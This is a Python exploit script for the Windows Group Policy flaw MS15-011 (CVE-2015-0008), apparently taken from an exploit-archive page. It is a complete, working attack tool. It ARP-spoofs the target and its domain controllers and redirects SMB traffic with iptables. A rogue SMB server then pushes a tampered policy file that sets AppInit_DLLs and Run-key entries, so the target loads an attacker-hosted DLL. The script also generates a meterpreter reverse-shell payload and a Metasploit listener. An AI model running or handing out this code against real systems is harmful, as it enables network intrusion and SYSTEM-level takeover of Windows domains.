152 lines
No EOL
6.9 KiB
Python
Executable file
152 lines
No EOL
6.9 KiB
Python
Executable file
# Exploit Title: Microsoft Windows Server 2012 - 'Group Policy' Remote Code Execution
|
|
# Date: 2019-10-28
|
|
# Exploit Author: Thomas Zuk
|
|
# Version: Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, Windows Server 2008 R2, Windows 8, Windows Server 2012,
|
|
# Windows RT, Windows 8.1, Windows Server 2012 R2, and Windows RT 8.1
|
|
# Tested on: Windows 7 , Windows Server 2012
|
|
# CVE : CVE-2015-0008
|
|
# Type: Remote
|
|
# Platform: Windows
|
|
|
|
# Description: While there exists multiple advisories for the vulnerability and video demos of
|
|
# successful exploitation there is no public exploit-code for MS15-011 (CVE-2015-0008). This exploit code
|
|
# targets vulnerable systems in order to modify registry keys to disable SMB signing, achieve SYSTEM level
|
|
# remote code execution (AppInit_DLL) and a user level remote code execution (Run Keys).
|
|
|
|
#!/usr/bin/python3
|
|
|
|
import argparse
|
|
import os
|
|
import subprocess
|
|
import socket
|
|
import fcntl
|
|
import struct
|
|
|
|
# MS15-011 Exploit.
|
|
# For more information and any updates/additions this exploit see the following Git Repo: https://github.com/Freakazoidile/Exploit_Dev/tree/master/MS15-011
|
|
# Example usage: python3 ms15-011.py -t 172.66.10.2 -d 172.66.10.10 -i eth1
|
|
# Example usage with multiple DC's: python3 ms15-011.py -t 172.66.10.2 -d 172.66.10.10 -d 172.66.10.11 -d 172.66.10.12 -i eth1
|
|
# Questions @Freakazoidile on twitter or make an issue on the GitHub repo. Enjoy.
|
|
|
|
def arpSpoof(interface, hostIP, targetIP):
|
|
arpCmd = "arpspoof -i %s %s %s " % (interface, hostIP, targetIP)
|
|
arpArgs = arpCmd.split()
|
|
print("Arpspoofing: %s" % (arpArgs))
|
|
p = subprocess.Popen(arpArgs, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
|
|
|
|
|
|
def karmaSMB(hostIP):
|
|
print("reverting GptTmpl.inf from bak")
|
|
os.system("cp GptTmpl.inf.bak GptTmpl.inf")
|
|
appInit = 'MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\AppInit_DLLs=1,"\\\\%s\\SYSVOL\\share.dll"\r\n' % (hostIP)
|
|
CURunKey = 'MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Key=1,"rundll32.exe \\\\%s\\SYSVOL\\share.dll",1\r\n' % (hostIP)
|
|
f = open("GptTmpl.inf","a", encoding='utf-16le')
|
|
f.write(appInit)
|
|
f.write(CURunKey)
|
|
f.close()
|
|
|
|
path = os.getcwd()
|
|
|
|
fConfig = open("smb.conf","w")
|
|
fConfig.write("ini = "+path+"/gpt.ini\ninf = "+path+"/GptTmpl.inf\ndll = "+path+"/shell.dll\n")
|
|
fConfig.close()
|
|
|
|
karmaCmd = "python karmaSMB.py -config smb.conf -smb2support ./ "
|
|
os.system(karmaCmd)
|
|
|
|
|
|
def iptables_config(targetIP, hostIP):
|
|
print('[+] Running command: echo "1" > /proc/sys/net/ipv4/ip_forward')
|
|
print('[+] Running command: iptables -t nat -A PREROUTING -p tcp -s %s --destination-port 445 -j DNAT --to-destination %s' % (targetIP, hostIP))
|
|
print('[+] Running command: iptables -t nat -A PREROUTING -p tcp -s %s --destination-port 139 -j DNAT --to-destination %s' % (targetIP, hostIP))
|
|
print('[+] Running command: iptables -t nat -A POSTROUTING -j MASQUERADE')
|
|
os.system('echo "1" > /proc/sys/net/ipv4/ip_forward')
|
|
os.system('iptables -t nat -A PREROUTING -p tcp -s %s --destination-port 445 -j DNAT --to-destination %s' % (targetIP, hostIP))
|
|
os.system('iptables -t nat -A PREROUTING -p tcp -s %s --destination-port 139 -j DNAT --to-destination %s' % (targetIP, hostIP))
|
|
os.system('iptables -t nat -A POSTROUTING -j MASQUERADE')
|
|
|
|
|
|
def get_interface_address(ifname):
|
|
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
|
|
return socket.inet_ntoa(fcntl.ioctl(s.fileno(), 0x8915, struct.pack('256s', bytes(ifname[:15], 'utf-8')))[20:24])
|
|
|
|
def generatePayload(lhost, lport):
|
|
print("generating payload(s) and metasploit resource file")
|
|
msfDll = "msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=%s lport=%s -f dll -o shell.dll" % (lhost, lport)
|
|
os.system(msfDll)
|
|
msfResource = "use multi/handler\nset payload windows/x64/meterpreter/reverse_tcp\nset lhost %s\nset lport %s\nset exitonsession false\nexploit -j\n" % (lhost, lport)
|
|
print("metasploit resource script: %s" % msfResource)
|
|
print ("metasploit resource script written to meta_resource.rc type 'msfconsole -r meta_resource.rc' to launch metasploit and stage a listener automatically")
|
|
|
|
file = open("meta_resource.rc", "w+")
|
|
file.write(msfResource)
|
|
file.close()
|
|
|
|
|
|
|
|
if __name__ == '__main__':
|
|
|
|
parser = argparse.ArgumentParser()
|
|
|
|
# Add arguments
|
|
parser.add_argument("-t", "--target_ip", help="The IP of the target machine vulnerable to ms15-011/14", required=True)
|
|
parser.add_argument("-d", "--domain_controller", help="The IP of the domain controller(s) in the target domain. Use this argument multiple times when multiple domain contollers are preset.\nE.G: -d 172.66.10.10 -d 172.66.10.11", action='append', required=True)
|
|
parser.add_argument("-i", "--interface", help="The interface to use. E.G eth0", required=True)
|
|
parser.add_argument("-l", "--lhost", help="The IP to listen for incoming connections on for reverse shell. This is optional, uses the IP from the provided interface by default. E.G 192.168.5.1", required=False)
|
|
parser.add_argument("-p", "--lport", help="The port to listen connections on for reverse shell. If not specified 4444 is used. E.G 443", required=False)
|
|
|
|
args = parser.parse_args()
|
|
|
|
# Check for KarmaSMB and GptTmpl.inf.bak, if missing download git repo with these files.
|
|
print ("checking for missing file(s)")
|
|
if not os.path.isfile("karmaSMB.py") and not os.path.isfile("GptTmpl.inf.bak"):
|
|
print("Requirements missing. Downloading required files from github")
|
|
os.system("git clone https://github.com/Freakazoidile/MS15-011-Files")
|
|
os.system("mv MS15-011-Files/* . && rm -rf MS15-011-Files/")
|
|
|
|
# Get the provided interfaces IP address
|
|
ipAddr = get_interface_address(args.interface)
|
|
|
|
if args.lhost is not None:
|
|
lhost = args.lhost
|
|
else:
|
|
lhost = ipAddr
|
|
|
|
if args.lport is not None:
|
|
lport = args.lport
|
|
else:
|
|
lport = '4444'
|
|
|
|
|
|
dcSpoof = ""
|
|
dcCommaList = ""
|
|
count = 0
|
|
|
|
# loop over the domain controllers, poison each and target the host IP
|
|
# create a comma separated list of DC's
|
|
# create a "-t" separate list of DC's for use with arpspoof
|
|
for dc in args.domain_controller:
|
|
dcSpoof += "-t %s " % (dc)
|
|
if count > 0:
|
|
dcCommaList += ",%s" % (dc)
|
|
else:
|
|
dcCommaList += "%s" % (dc)
|
|
|
|
arpSpoof(args.interface, dc, "-t %s" % (args.target_ip))
|
|
count += 1
|
|
|
|
# arpspoof the target and all of the DC's
|
|
arpSpoof(args.interface, args.target_ip, dcSpoof)
|
|
|
|
# generate payloads
|
|
generatePayload(lhost, lport)
|
|
|
|
# Setup iptables forwarding rules
|
|
iptables_config(args.target_ip, ipAddr)
|
|
|
|
#run Karmba SMB Server
|
|
karmaSMB(ipAddr)
|
|
|
|
|
|
print("Targeting %s by arp spoofing %s and domain controllers: %s " % (args.target_ip, args.target_ip, args.domain_controllers))
|
|
print("If you interupt/stop the exploit ensure you stop all instances of arpspoof and flush firewall rules!") |